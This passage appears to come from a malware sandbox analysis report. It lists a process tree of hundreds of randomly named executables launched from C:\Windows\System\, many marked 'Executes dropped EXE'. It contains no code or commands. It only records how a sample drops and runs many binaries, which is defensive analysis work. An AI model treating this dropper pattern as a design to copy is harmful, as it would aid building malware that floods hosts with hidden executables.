  2⤵
  - Executes dropped EXE
  PID:4532
- C:\Windows\System\POZFaMl.exe
  C:\Windows\System\POZFaMl.exe
  2⤵
  - Executes dropped EXE
  PID:3648
- C:\Windows\System\yYEZjDI.exe
  C:\Windows\System\yYEZjDI.exe
  2⤵
  - Executes dropped EXE
  PID:3372
- C:\Windows\System\KhASepu.exe
  C:\Windows\System\KhASepu.exe
  2⤵
  - Executes dropped EXE
  PID:1356
- C:\Windows\System\snRtvqk.exe
  C:\Windows\System\snRtvqk.exe
  2⤵
  - Executes dropped EXE
  PID:3628
- C:\Windows\System\WheXMmb.exe
  C:\Windows\System\WheXMmb.exe
  2⤵
  - Executes dropped EXE
  PID:3556
- C:\Windows\System\BZPeLDR.exe
  C:\Windows\System\BZPeLDR.exe
  2⤵
  - Executes dropped EXE
  PID:4588
- C:\Windows\System\NjarhzE.exe
  C:\Windows\System\NjarhzE.exe
  2⤵
  - Executes dropped EXE
  PID:1716
- C:\Windows\System\IuSmGbS.exe
  C:\Windows\System\IuSmGbS.exe
  2⤵
  - Executes dropped EXE
  PID:3232
- C:\Windows\System\QQWvfJZ.exe
  C:\Windows\System\QQWvfJZ.exe
  2⤵
  - Executes dropped EXE
  PID:2144
- C:\Windows\System\WkgUQxE.exe
  C:\Windows\System\WkgUQxE.exe
  2⤵
  - Executes dropped EXE
  PID:3204
- C:\Windows\System\hHKFqeA.exe
  C:\Windows\System\hHKFqeA.exe
  2⤵
  - Executes dropped EXE
  PID:3584
- C:\Windows\System\pXIWKCi.exe
  C:\Windows\System\pXIWKCi.exe
  2⤵
  - Executes dropped EXE
  PID:2360
- C:\Windows\System\rxDeurv.exe
  C:\Windows\System\rxDeurv.exe
  2⤵
  - Executes dropped EXE
  PID:4664
- C:\Windows\System\BwdTzPm.exe
  C:\Windows\System\BwdTzPm.exe
  2⤵
  - Executes dropped EXE
  PID:4740
- C:\Windows\System\kxDVvfz.exe
  C:\Windows\System\kxDVvfz.exe
  2⤵
  - Executes dropped EXE
  PID:3636
- C:\Windows\System\NFbMiYC.exe
  C:\Windows\System\NFbMiYC.exe
  2⤵
  - Executes dropped EXE
  PID:5076
- C:\Windows\System\VhvJneu.exe
  C:\Windows\System\VhvJneu.exe
  2⤵
  - Executes dropped EXE
  PID:4444
- C:\Windows\System\xNDDeFN.exe
  C:\Windows\System\xNDDeFN.exe
  2⤵
  - Executes dropped EXE
  PID:2496
- C:\Windows\System\gCjYLiO.exe
  C:\Windows\System\gCjYLiO.exe
  2⤵
  - Executes dropped EXE
  PID:2956
- C:\Windows\System\rAsjPqL.exe
  C:\Windows\System\rAsjPqL.exe
  2⤵
  - Executes dropped EXE
  PID:1076
- C:\Windows\System\DtQcveW.exe
  C:\Windows\System\DtQcveW.exe
  2⤵
  - Executes dropped EXE
  PID:3800
- C:\Windows\System\StzyGgL.exe
  C:\Windows\System\StzyGgL.exe
  2⤵
  - Executes dropped EXE
  PID:2216
- C:\Windows\System\NenfCaW.exe
  C:\Windows\System\NenfCaW.exe
  2⤵
  - Executes dropped EXE
  PID:3032
- C:\Windows\System\vEnlVXK.exe
  C:\Windows\System\vEnlVXK.exe
  2⤵
  - Executes dropped EXE
  PID:2944
- C:\Windows\System\dsNbutd.exe
  C:\Windows\System\dsNbutd.exe
  2⤵
  - Executes dropped EXE
  PID:3404
- C:\Windows\System\tvatPJK.exe
  C:\Windows\System\tvatPJK.exe
  2⤵
  - Executes dropped EXE
  PID:4468
- C:\Windows\System\trGCXef.exe
  C:\Windows\System\trGCXef.exe
  2⤵
  - Executes dropped EXE
  PID:1472
- C:\Windows\System\FdvvIij.exe
  C:\Windows\System\FdvvIij.exe
  2⤵
  - Executes dropped EXE
  PID:1428
- C:\Windows\System\lfsRCTa.exe
  C:\Windows\System\lfsRCTa.exe
  2⤵
  - Executes dropped EXE
  PID:4500
- C:\Windows\System\TMExwER.exe
  C:\Windows\System\TMExwER.exe
  2⤵
  - Executes dropped EXE
  PID:3620
- C:\Windows\System\SajrVKN.exe
  C:\Windows\System\SajrVKN.exe
  2⤵
  - Executes dropped EXE
  PID:2424
- C:\Windows\System\fxhHLpy.exe
  C:\Windows\System\fxhHLpy.exe
  2⤵
  - Executes dropped EXE
  PID:3308
- C:\Windows\System\RKkQsgY.exe
  C:\Windows\System\RKkQsgY.exe
  2⤵
  - Executes dropped EXE
  PID:5100
- C:\Windows\System\UqhPxdw.exe
  C:\Windows\System\UqhPxdw.exe
  2⤵
  - Executes dropped EXE
  PID:760
- C:\Windows\System\vKkcAuz.exe
  C:\Windows\System\vKkcAuz.exe
  2⤵
  - Executes dropped EXE
  PID:4324
- C:\Windows\System\SjXlYPT.exe
  C:\Windows\System\SjXlYPT.exe
  2⤵
  - Executes dropped EXE
  PID:1616
- C:\Windows\System\DcJswQC.exe
  C:\Windows\System\DcJswQC.exe
  2⤵
  - Executes dropped EXE
  PID:1144
- C:\Windows\System\ijuQYMO.exe
  C:\Windows\System\ijuQYMO.exe
  2⤵
  - Executes dropped EXE
  PID:5040
- C:\Windows\System\IazzGPn.exe
  C:\Windows\System\IazzGPn.exe
  2⤵
  - Executes dropped EXE
  PID:1504
- C:\Windows\System\MkBtCKG.exe
  C:\Windows\System\MkBtCKG.exe
  2⤵
  - Executes dropped EXE
  PID:4712
- C:\Windows\System\YCpGSOs.exe
  C:\Windows\System\YCpGSOs.exe
  2⤵
  - Executes dropped EXE
  PID:1004
- C:\Windows\System\YeEMzzs.exe
  C:\Windows\System\YeEMzzs.exe
  2⤵
  - Executes dropped EXE
  PID:1704
- C:\Windows\System\HHqQayC.exe
  C:\Windows\System\HHqQayC.exe
  2⤵
  - Executes dropped EXE
  PID:2536
- C:\Windows\System\RQgQkDO.exe
  C:\Windows\System\RQgQkDO.exe
  2⤵
  - Executes dropped EXE
  PID:3360
- C:\Windows\System\CYKXhUb.exe
  C:\Windows\System\CYKXhUb.exe
  2⤵
  - Executes dropped EXE
  PID:4788
- C:\Windows\System\kBYSCyJ.exe
  C:\Windows\System\kBYSCyJ.exe
  2⤵
  - Executes dropped EXE
  PID:968
- C:\Windows\System\NinyBsQ.exe
  C:\Windows\System\NinyBsQ.exe
  2⤵
  - Executes dropped EXE
  PID:4600
- C:\Windows\System\SFOSAtV.exe
  C:\Windows\System\SFOSAtV.exe
  2⤵
  - Executes dropped EXE
  PID:1612
- C:\Windows\System\nFdlgQE.exe
  C:\Windows\System\nFdlgQE.exe
  2⤵
  - Executes dropped EXE
  PID:2168
- C:\Windows\System\jDVfaLV.exe
  C:\Windows\System\jDVfaLV.exe
  2⤵
  - Executes dropped EXE
  PID:2156
- C:\Windows\System\QPHcGBi.exe
  C:\Windows\System\QPHcGBi.exe
  2⤵
  - Executes dropped EXE
  PID:2828
- C:\Windows\System\HxIoaBE.exe
  C:\Windows\System\HxIoaBE.exe
  2⤵
  - Executes dropped EXE
  PID:652
- C:\Windows\System\IjNCePv.exe
  C:\Windows\System\IjNCePv.exe
  2⤵
  - Executes dropped EXE
  PID:4400
- C:\Windows\System\mvLwrue.exe
  C:\Windows\System\mvLwrue.exe
  2⤵
  - Executes dropped EXE
  PID:840
- C:\Windows\System\nRBXErH.exe
  C:\Windows\System\nRBXErH.exe
  2⤵
  - Executes dropped EXE
  PID:3268
- C:\Windows\System\ntvBraQ.exe
  C:\Windows\System\ntvBraQ.exe
  2⤵
  - Executes dropped EXE
  PID:3876
- C:\Windows\System\YHmjtEy.exe
  C:\Windows\System\YHmjtEy.exe
  2⤵
  - Executes dropped EXE
  PID:1976
- C:\Windows\System\umqvDFP.exe
  C:\Windows\System\umqvDFP.exe
  2⤵
  - Executes dropped EXE
  PID:2808
- C:\Windows\System\fCSbZQO.exe
  C:\Windows\System\fCSbZQO.exe
  2⤵
  - Executes dropped EXE
  PID:3752
- C:\Windows\System\ZvpqxRV.exe
  C:\Windows\System\ZvpqxRV.exe
  2⤵
  - Executes dropped EXE
  PID:1684
- C:\Windows\System\tKQYkzF.exe
  C:\Windows\System\tKQYkzF.exe
  2⤵
  PID:4040
- C:\Windows\System\iABSNie.exe
  C:\Windows\System\iABSNie.exe
  2⤵
  PID:1432
- C:\Windows\System\eJbFkpj.exe
  C:\Windows\System\eJbFkpj.exe
  2⤵
  PID:3128
- C:\Windows\System\zpEXObF.exe
  C:\Windows\System\zpEXObF.exe
  2⤵
  PID:3612
- C:\Windows\System\MnpFPIq.exe
  C:\Windows\System\MnpFPIq.exe
  2⤵
  PID:2648
- C:\Windows\System\XZtpEmW.exe
  C:\Windows\System\XZtpEmW.exe
  2⤵
  PID:940
- C:\Windows\System\ErSSDhx.exe
  C:\Windows\System\ErSSDhx.exe
  2⤵
  PID:3284
- C:\Windows\System\jsDSuUc.exe
  C:\Windows\System\jsDSuUc.exe
  2⤵
  PID:2320
- C:\Windows\System\qVFHLet.exe
  C:\Windows\System\qVFHLet.exe
  2⤵
  PID:2120
- C:\Windows\System\tppSUgQ.exe
  C:\Windows\System\tppSUgQ.exe
  2⤵
  PID:1456
- C:\Windows\System\jAWdJTI.exe
  C:\Windows\System\jAWdJTI.exe
  2⤵
  PID:4884
- C:\Windows\System\oqZkycU.exe
  C:\Windows\System\oqZkycU.exe
  2⤵
  PID:5124
- C:\Windows\System\FHPgbEz.exe
  C:\Windows\System\FHPgbEz.exe
  2⤵
  PID:5148
- C:\Windows\System\AvkKRGN.exe
  C:\Windows\System\AvkKRGN.exe
  2⤵
  PID:5176
- C:\Windows\System\UaWaVIW.exe
  C:\Windows\System\UaWaVIW.exe
  2⤵
  PID:5204
- C:\Windows\System\oNDuDqr.exe
  C:\Windows\System\oNDuDqr.exe
  2⤵
  PID:5236
- C:\Windows\System\IYNdjDp.exe
  C:\Windows\System\IYNdjDp.exe
  2⤵
  PID:5264
- C:\Windows\System\jsxStFY.exe
  C:\Windows\System\jsxStFY.exe
  2⤵
  PID:5292
- C:\Windows\System\uVvUUUj.exe
  C:\Windows\System\uVvUUUj.exe
  2⤵
  PID:5320
- C:\Windows\System\ZfpsREA.exe
  C:\Windows\System\ZfpsREA.exe
  2⤵
  PID:5348
- C:\Windows\System\MFuIXPe.exe
  C:\Windows\System\MFuIXPe.exe
  2⤵
  PID:5376
- C:\Windows\System\kvUFqHr.exe
  C:\Windows\System\kvUFqHr.exe
  2⤵
  PID:5404
- C:\Windows\System\pmRvMnF.exe
  C:\Windows\System\pmRvMnF.exe
  2⤵
  PID:5432
- C:\Windows\System\BhzMqaI.exe
  C:\Windows\System\BhzMqaI.exe
  2⤵
  PID:5460
- C:\Windows\System\SQbjCfW.exe
  C:\Windows\System\SQbjCfW.exe
  2⤵
  PID:5488
- C:\Windows\System\mWdwPJn.exe
  C:\Windows\System\mWdwPJn.exe
  2⤵
  PID:5512
- C:\Windows\System\rcPySjY.exe
  C:\Windows\System\rcPySjY.exe
  2⤵
  PID:5540
- C:\Windows\System\NEPqsBN.exe
  C:\Windows\System\NEPqsBN.exe
  2⤵
  PID:5572
- C:\Windows\System\qYDgxaI.exe
  C:\Windows\System\qYDgxaI.exe
  2⤵
  PID:5604
- C:\Windows\System\GNYFvAF.exe
  C:\Windows\System\GNYFvAF.exe
  2⤵
  PID:5628
- C:\Windows\System\xyBMNoF.exe
  C:\Windows\System\xyBMNoF.exe
  2⤵
  PID:5656
- C:\Windows\System\aPxqQgD.exe
  C:\Windows\System\aPxqQgD.exe
  2⤵
  PID:5684
- C:\Windows\System\haHccBG.exe
  C:\Windows\System\haHccBG.exe
  2⤵
  PID:5712
- C:\Windows\System\GaSODrW.exe
  C:\Windows\System\GaSODrW.exe
  2⤵
  PID:5740
- C:\Windows\System\HqiOyRB.exe
  C:\Windows\System\HqiOyRB.exe
  2⤵
  PID:5768
- C:\Windows\System\xxHEIpU.exe
  C:\Windows\System\xxHEIpU.exe
  2⤵
  PID:5792
- C:\Windows\System\kjUdQEN.exe
  C:\Windows\System\kjUdQEN.exe
  2⤵
  PID:5824
- C:\Windows\System\TNjBxmL.exe
  C:\Windows\System\TNjBxmL.exe
  2⤵
  PID:5852
- C:\Windows\System\inBwfSm.exe
  C:\Windows\System\inBwfSm.exe
  2⤵
  PID:5880
- C:\Windows\System\caHUgsq.exe
  C:\Windows\System\caHUgsq.exe
  2⤵
  PID:5908
- C:\Windows\System\DLjHpkg.exe
  C:\Windows\System\DLjHpkg.exe
  2⤵
  PID:5936
- C:\Windows\System\DzDZbqO.exe
  C:\Windows\System\DzDZbqO.exe
  2⤵
  PID:5964
- C:\Windows\System\zfCeNEY.exe
  C:\Windows\System\zfCeNEY.exe
  2⤵
  PID:5992
- C:\Windows\System\MwnXukM.exe
  C:\Windows\System\MwnXukM.exe
  2⤵
  PID:6016
- C:\Windows\System\NHYBvsZ.exe
  C:\Windows\System\NHYBvsZ.exe
  2⤵
  PID:6044
- C:\Windows\System\CUEJhFq.exe
  C:\Windows\System\CUEJhFq.exe
  2⤵
  PID:6072
- C:\Windows\System\DmuLJWK.exe
  C:\Windows\System\DmuLJWK.exe
  2⤵
  PID:6100
- C:\Windows\System\CWuEkYw.exe
  C:\Windows\System\CWuEkYw.exe
  2⤵
  PID:6132
- C:\Windows\System\pjhzBTv.exe
  C:\Windows\System\pjhzBTv.exe
  2⤵
  PID:1708
- C:\Windows\System\CgWLEPu.exe
  C:\Windows\System\CgWLEPu.exe
  2⤵
  PID:4376
- C:\Windows\System\SEsfHgP.exe
  C:\Windows\System\SEsfHgP.exe
  2⤵
  PID:3960
- C:\Windows\System\IIdwxzl.exe
  C:\Windows\System\IIdwxzl.exe
  2⤵
  PID:3608
- C:\Windows\System\MYghOGU.exe
  C:\Windows\System\MYghOGU.exe
  2⤵
  PID:4924
- C:\Windows\System\UrbSOYJ.exe
  C:\Windows\System\UrbSOYJ.exe
  2⤵
  PID:5168
- C:\Windows\System\RDPfkeN.exe
  C:\Windows\System\RDPfkeN.exe
  2⤵
  PID:5228
- C:\Windows\System\lsEMEQT.exe
  C:\Windows\System\lsEMEQT.exe
  2⤵
  PID:5304
- C:\Windows\System\EkjQyxa.exe
  C:\Windows\System\EkjQyxa.exe
  2⤵
  PID:5364
- C:\Windows\System\DwlOTwr.exe
  C:\Windows\System\DwlOTwr.exe
  2⤵
  PID:5448
- C:\Windows\System\uDNfPxd.exe
  C:\Windows\System\uDNfPxd.exe
  2⤵
  PID:5508
- C:\Windows\System\WjSNDUr.exe
  C:\Windows\System\WjSNDUr.exe
  2⤵
  PID:5584
- C:\Windows\System\XxlGhgj.exe
  C:\Windows\System\XxlGhgj.exe
  2⤵
  PID:5624
- C:\Windows\System\jbSboMx.exe
  C:\Windows\System\jbSboMx.exe
  2⤵
  PID:5696
- C:\Windows\System\RPanvHa.exe
  C:\Windows\System\RPanvHa.exe
  2⤵
  PID:5756
- C:\Windows\System\PpSqbUm.exe
  C:\Windows\System\PpSqbUm.exe
  2⤵
  PID:5816
- C:\Windows\System\QWYQefG.exe
  C:\Windows\System\QWYQefG.exe
  2⤵
  PID:5892
- C:\Windows\System\YABNAom.exe
  C:\Windows\System\YABNAom.exe
  2⤵
  PID:5952
- C:\Windows\System\tfMPljG.exe
  C:\Windows\System\tfMPljG.exe
  2⤵
  PID:6008
- C:\Windows\System\MuvmXlt.exe
  C:\Windows\System\MuvmXlt.exe
  2⤵
  PID:6092
- C:\Windows\System\AwNjCtQ.exe
  C:\Windows\System\AwNjCtQ.exe
  2⤵
  PID:3788
- C:\Windows\System\IRQQwZE.exe
  C:\Windows\System\IRQQwZE.exe
  2⤵
  PID:3932
- C:\Windows\System\zTtKztc.exe
  C:\Windows\System\zTtKztc.exe
  2⤵
  PID:5140
- C:\Windows\System\xhZwOsW.exe
  C:\Windows\System\xhZwOsW.exe
  2⤵
  PID:5284
- C:\Windows\System\rbRmNGz.exe
  C:\Windows\System\rbRmNGz.exe
  2⤵
  PID:5480
- C:\Windows\System\rVdMpHc.exe
  C:\Windows\System\rVdMpHc.exe
  2⤵
  PID:5620
- C:\Windows\System\cJRhZCm.exe
  C:\Windows\System\cJRhZCm.exe
  2⤵
  PID:5732
- C:\Windows\System\cNStwRy.exe
  C:\Windows\System\cNStwRy.exe
  2⤵
  PID:5864
- C:\Windows\System\GismNFy.exe
  C:\Windows\System\GismNFy.exe
  2⤵
  PID:6160
- C:\Windows\System\SsveEHq.exe
  C:\Windows\System\SsveEHq.exe
  2⤵
  PID:6192
- C:\Windows\System\iCnKchz.exe
  C:\Windows\System\iCnKchz.exe
  2⤵
  PID:6220
- C:\Windows\System\yLVbgFF.exe
  C:\Windows\System\yLVbgFF.exe
  2⤵
  PID:6248
- C:\Windows\System\NZNsDHm.exe
  C:\Windows\System\NZNsDHm.exe
  2⤵
  PID:6276
- C:\Windows\System\gttZfeU.exe
  C:\Windows\System\gttZfeU.exe
  2⤵
  PID:6304
- C:\Windows\System\mttAuHV.exe
  C:\Windows\System\mttAuHV.exe
  2⤵
  PID:6332
- C:\Windows\System\aYmyKQW.exe
  C:\Windows\System\aYmyKQW.exe
  2⤵
  PID:6360
- C:\Windows\System\CslRQyj.exe
  C:\Windows\System\CslRQyj.exe
  2⤵
  PID:6388
- C:\Windows\System\LBqOlOs.exe
  C:\Windows\System\LBqOlOs.exe
  2⤵
  PID:6416
- C:\Windows\System\PhpFkQl.exe
  C:\Windows\System\PhpFkQl.exe
  2⤵
  PID:6444
- C:\Windows\System\eyUeNgW.exe
  C:\Windows\System\eyUeNgW.exe
  2⤵
  PID:6472
- C:\Windows\System\qAotbAc.exe
  C:\Windows\System\qAotbAc.exe
  2⤵
  PID:6500
- C:\Windows\System\oELbUHl.exe
  C:\Windows\System\oELbUHl.exe
  2⤵
  PID:6528
- C:\Windows\System\wfDHKVj.exe
  C:\Windows\System\wfDHKVj.exe
  2⤵
  PID:6556
- C:\Windows\System\ZhIWhLI.exe
  C:\Windows\System\ZhIWhLI.exe
  2⤵
  PID:6584
- C:\Windows\System\xvfyamE.exe
  C:\Windows\System\xvfyamE.exe
  2⤵
  PID:6612
- C:\Windows\System\zVaRWen.exe
  C:\Windows\System\zVaRWen.exe
  2⤵
  PID:6640
- C:\Windows\System\yEWqWWu.exe
  C:\Windows\System\yEWqWWu.exe
  2⤵
  PID:6668
- C:\Windows\System\pkarbkE.exe
  C:\Windows\System\pkarbkE.exe
  2⤵
  PID:6696
- C:\Windows\System\zCQeRMN.exe
  C:\Windows\System\zCQeRMN.exe
  2⤵
  PID:6724
- C:\Windows\System\gNsknYV.exe
  C:\Windows\System\gNsknYV.exe
  2⤵
  PID:6752
- C:\Windows\System\WOZjTbb.exe
  C:\Windows\System\WOZjTbb.exe
  2⤵
  PID:6780
- C:\Windows\System\gHCdwtJ.exe
  C:\Windows\System\gHCdwtJ.exe
  2⤵
  PID:6808
- C:\Windows\System\pIgXVLY.exe
  C:\Windows\System\pIgXVLY.exe
  2⤵
  PID:6836
- C:\Windows\System\upXdxWv.exe
  C:\Windows\System\upXdxWv.exe
  2⤵
  PID:6864
- C:\Windows\System\RmajwSg.exe
  C:\Windows\System\RmajwSg.exe
  2⤵
  PID:6892
- C:\Windows\System\CBvFIPb.exe
  C:\Windows\System\CBvFIPb.exe
  2⤵
  PID:6920
- C:\Windows\System\EAKCvAa.exe
  C:\Windows\System\EAKCvAa.exe
  2⤵
  PID:6948
- C:\Windows\System\LzQDPqj.exe
  C:\Windows\System\LzQDPqj.exe
  2⤵
  PID:6976
- C:\Windows\System\KkRejYO.exe
  C:\Windows\System\KkRejYO.exe
  2⤵
  PID:7004
- C:\Windows\System\BeuwCJW.exe
  C:\Windows\System\BeuwCJW.exe
  2⤵
  PID:7032
- C:\Windows\System\JEHBosX.exe
  C:\Windows\System\JEHBosX.exe
  2⤵
  PID:7060
- C:\Windows\System\oAtdKWb.exe
  C:\Windows\System\oAtdKWb.exe
  2⤵
  PID:7088
- C:\Windows\System\YANgKCt.exe
  C:\Windows\System\YANgKCt.exe
  2⤵
  PID:7116
- C:\Windows\System\FdkWQsb.exe
  C:\Windows\System\FdkWQsb.exe
  2⤵
  PID:7144
- C:\Windows\System\gudDFJW.exe
  C:\Windows\System\gudDFJW.exe
  2⤵
  PID:5928
- C:\Windows\System\WGopujN.exe
  C:\Windows\System\WGopujN.exe
  2⤵
  PID:1044
- C:\Windows\System\mGkexSM.exe
  C:\Windows\System\mGkexSM.exe
  2⤵
  PID:3332
- C:\Windows\System\IaagiBQ.exe
  C:\Windows\System\IaagiBQ.exe
  2⤵
  PID:5396
- C:\Windows\System\aBmyNSz.exe
  C:\Windows\System\aBmyNSz.exe
  2⤵
  PID:5728
- C:\Windows\System\KdmhIxE.exe
  C:\Windows\System\KdmhIxE.exe
  2⤵
  PID:6180
- C:\Windows\System\oABNGTF.exe
  C:\Windows\System\oABNGTF.exe
  2⤵
  PID:6240
- C:\Windows\System\hMUAwWw.exe
  C:\Windows\System\hMUAwWw.exe
  2⤵
  PID:6316
- C:\Windows\System\IUjtcOd.exe
  C:\Windows\System\IUjtcOd.exe
  2⤵
  PID:6376
- C:\Windows\System\etOJPjS.exe
  C:\Windows\System\etOJPjS.exe
  2⤵
  PID:6432
- C:\Windows\System\cuRcOwh.exe
  C:\Windows\System\cuRcOwh.exe
  2⤵
  PID:6492
- C:\Windows\System\KgmxGSp.exe
  C:\Windows\System\KgmxGSp.exe
  2⤵
  PID:6548
- C:\Windows\System\eKvHefG.exe
  C:\Windows\System\eKvHefG.exe
  2⤵
  PID:6604
- C:\Windows\System\EGwyZGP.exe
  C:\Windows\System\EGwyZGP.exe
  2⤵
  PID:6684
- C:\Windows\System\ESEaPDF.exe
  C:\Windows\System\ESEaPDF.exe
  2⤵
  PID:6744
- C:\Windows\System\oajzdpN.exe
  C:\Windows\System\oajzdpN.exe
  2⤵
  PID:6820
- C:\Windows\System\frOkyoT.exe
  C:\Windows\System\frOkyoT.exe
  2⤵
  PID:6880
- C:\Windows\System\pdZKskD.exe
  C:\Windows\System\pdZKskD.exe
  2⤵
  PID:3132
- C:\Windows\System\TJBSqMX.exe
  C:\Windows\System\TJBSqMX.exe
  2⤵
  PID:6988
- C:\Windows\System\ihUgWnw.exe
  C:\Windows\System\ihUgWnw.exe
  2⤵
  PID:7048
- C:\Windows\System\TJYBVJP.exe
  C:\Windows\System\TJYBVJP.exe
  2⤵
  PID:7108
- C:\Windows\System\SysnnXx.exe
  C:\Windows\System\SysnnXx.exe
  2⤵
  PID:7164
- C:\Windows\System\fhNoydO.exe
  C:\Windows\System\fhNoydO.exe
  2⤵
  PID:5220
- C:\Windows\System\mziHPmZ.exe
  C:\Windows\System\mziHPmZ.exe
  2⤵
  PID:6152
- C:\Windows\System\krHgxCs.exe
  C:\Windows\System\krHgxCs.exe
  2⤵
  PID:6292
- C:\Windows\System\oKGqTsb.exe
  C:\Windows\System\oKGqTsb.exe
  2⤵
  PID:6404
- C:\Windows\System\sKjxLHF.exe
  C:\Windows\System\sKjxLHF.exe
  2⤵
  PID:6540
- C:\Windows\System\FWoeEjY.exe
  C:\Windows\System\FWoeEjY.exe
  2⤵
  PID:6712
- C:\Windows\System\RGxMiYX.exe
  C:\Windows\System\RGxMiYX.exe
  2⤵
  PID:6796
- C:\Windows\System\QHbSSZr.exe
  C:\Windows\System\QHbSSZr.exe
  2⤵
  PID:6932
- C:\Windows\System\CYuJEzM.exe
  C:\Windows\System\CYuJEzM.exe
  2⤵
  PID:7076
- C:\Windows\System\qazGzxJ.exe
  C:\Windows\System\qazGzxJ.exe
  2⤵
  PID:6088
- C:\Windows\System\fYiNeQb.exe
  C:\Windows\System\fYiNeQb.exe
  2⤵
  PID:6212
- C:\Windows\System\EJMCGsC.exe
  C:\Windows\System\EJMCGsC.exe
  2⤵
  PID:7188
- C:\Windows\System\tdQOcEw.exe
  C:\Windows\System\tdQOcEw.exe
  2⤵
  PID:7216
- C:\Windows\System\oCUECAH.exe
  C:\Windows\System\oCUECAH.exe
  2⤵
  PID:7244
- C:\Windows\System\KVnzlLu.exe
  C:\Windows\System\KVnzlLu.exe
  2⤵
  PID:7272
- C:\Windows\System\HsWCXhZ.exe
  C:\Windows\System\HsWCXhZ.exe
  2⤵
  PID:7300
- C:\Windows\System\KBqiyBg.exe
  C:\Windows\System\KBqiyBg.exe
  2⤵
  PID:7328
- C:\Windows\System\FYSOddK.exe
  C:\Windows\System\FYSOddK.exe
  2⤵
  PID:7356
- C:\Windows\System\rrzKrSX.exe
  C:\Windows\System\rrzKrSX.exe
  2⤵
  PID:7384
- C:\Windows\System\BhgKXst.exe
  C:\Windows\System\BhgKXst.exe
  2⤵
  PID:7412
- C:\Windows\System\DxvpAqI.exe
  C:\Windows\System\DxvpAqI.exe
  2⤵
  PID:7444
- C:\Windows\System\ZBPVmZe.exe
  C:\Windows\System\ZBPVmZe.exe
  2⤵
  PID:7468
- C:\Windows\System\zuctinh.exe
  C:\Windows\System\zuctinh.exe
  2⤵
  PID:7496
- C:\Windows\System\ZuaTAds.exe
  C:\Windows\System\ZuaTAds.exe
  2⤵
  PID:7520
- C:\Windows\System\kkobSQr.exe
  C:\Windows\System\kkobSQr.exe
  2⤵
  PID:7548
- C:\Windows\System\fKehoyM.exe
  C:\Windows\System\fKehoyM.exe
  2⤵
  PID:7580
- C:\Windows\System\lhXrQGU.exe
  C:\Windows\System\lhXrQGU.exe
  2⤵
  PID:7608
- C:\Windows\System\ccJfLjt.exe
  C:\Windows\System\ccJfLjt.exe
  2⤵
  PID:7636
- C:\Windows\System\DancEOT.exe
  C:\Windows\System\DancEOT.exe
  2⤵
  PID:7664
- C:\Windows\System\cDAsedu.exe
  C:\Windows\System\cDAsedu.exe
  2⤵
  PID:7692
- C:\Windows\System\NRvqeQR.exe
  C:\Windows\System\NRvqeQR.exe
  2⤵
  PID:7720
- C:\Windows\System\nsAdvHa.exe
  C:\Windows\System\nsAdvHa.exe
  2⤵
  PID:7748
- C:\Windows\System\hHOBtqC.exe
  C:\Windows\System\hHOBtqC.exe
  2⤵
  PID:7776
- C:\Windows\System\KxymhEd.exe
  C:\Windows\System\KxymhEd.exe
  2⤵
  PID:7804
- C:\Windows\System\eMbLNIb.exe
  C:\Windows\System\eMbLNIb.exe
  2⤵
  PID:7832
- C:\Windows\System\xsoKPcy.exe
  C:\Windows\System\xsoKPcy.exe
  2⤵
  PID:7860
- C:\Windows\System\niknzbj.exe
  C:\Windows\System\niknzbj.exe
  2⤵
  PID:7888
- C:\Windows\System\eiDfMiL.exe
  C:\Windows\System\eiDfMiL.exe
  2⤵
  PID:7916
- C:\Windows\System\rGxjXWH.exe
  C:\Windows\System\rGxjXWH.exe
  2⤵
  PID:7944
- C:\Windows\System\rroJRAr.exe
  C:\Windows\System\rroJRAr.exe
  2⤵
  PID:7972
- C:\Windows\System\GzJZyaI.exe
  C:\Windows\System\GzJZyaI.exe
  2⤵
  PID:8000
- C:\Windows\System\ynJdNxE.exe
  C:\Windows\System\ynJdNxE.exe
  2⤵
  PID:8096
- C:\Windows\System\AmfeHkY.exe
  C:\Windows\System\AmfeHkY.exe
  2⤵
  PID:8124
- C:\Windows\System\htuhmlt.exe
  C:\Windows\System\htuhmlt.exe
  2⤵
  PID:8160
- C:\Windows\System\wcoaQWO.exe
  C:\Windows\System\wcoaQWO.exe
  2⤵
  PID:1500
- C:\Windows\System\wtJbFXH.exe
  C:\Windows\System\wtJbFXH.exe
  2⤵
  PID:6652
- C:\Windows\System\UNsAsoa.exe
  C:\Windows\System\UNsAsoa.exe
  2⤵
  PID:4088
- C:\Windows\System\UduWZqX.exe
  C:\Windows\System\UduWZqX.exe
  2⤵
  PID:7156
- C:\Windows\System\HMVOFog.exe
  C:\Windows\System\HMVOFog.exe
  2⤵
  PID:7172
- C:\Windows\System\XDfKwZj.exe
  C:\Windows\System\XDfKwZj.exe
  2⤵
  PID:7208
- C:\Windows\System\lmQiZDb.exe
  C:\Windows\System\lmQiZDb.exe
  2⤵
  PID:7236
- C:\Windows\System\AXzyLta.exe
  C:\Windows\System\AXzyLta.exe
  2⤵
  PID:4212
- C:\Windows\System\lgIKFyf.exe
  C:\Windows\System\lgIKFyf.exe
  2⤵
  PID:3972
- C:\Windows\System\CLfnoxI.exe
  C:\Windows\System\CLfnoxI.exe
  2⤵
  PID:7368
- C:\Windows\System\fDhljHy.exe
  C:\Windows\System\fDhljHy.exe
  2⤵
  PID:7440
- C:\Windows\System\yqjckxU.exe
  C:\Windows\System\yqjckxU.exe
  2⤵
  PID:7480
- C:\Windows\System\kfXpifX.exe
  C:\Windows\System\kfXpifX.exe
  2⤵
  PID:7544
- C:\Windows\System\rwrpYYt.exe
  C:\Windows\System\rwrpYYt.exe
  2⤵
  PID:7656
- C:\Windows\System\DLBWcof.exe
  C:\Windows\System\DLBWcof.exe
  2⤵
  PID:7708
- C:\Windows\System\xOYXcHm.exe
  C:\Windows\System\xOYXcHm.exe
  2⤵
  PID:4828
- C:\Windows\System\sfxCgfW.exe
  C:\Windows\System\sfxCgfW.exe
  2⤵
  PID:7820
- C:\Windows\System\EWyJcaf.exe
  C:\Windows\System\EWyJcaf.exe
  2⤵
  PID:7900
- C:\Windows\System\gmfpgDA.exe
  C:\Windows\System\gmfpgDA.exe
  2⤵
  PID:7960
- C:\Windows\System\RyaElud.exe
  C:\Windows\System\RyaElud.exe
  2⤵
  PID:7936
- C:\Windows\System\LVoGoZg.exe
  C:\Windows\System\LVoGoZg.exe
  2⤵
  PID:4768
- C:\Windows\System\lUjXIGm.exe
  C:\Windows\System\lUjXIGm.exe
  2⤵
  PID:4912
- C:\Windows\System\WNLpTXB.exe
  C:\Windows\System\WNLpTXB.exe
  2⤵
  PID:8112
- C:\Windows\System\AOyiCfq.exe
  C:\Windows\System\AOyiCfq.exe
  2⤵
  PID:8140
- C:\Windows\System\eTePwqS.exe
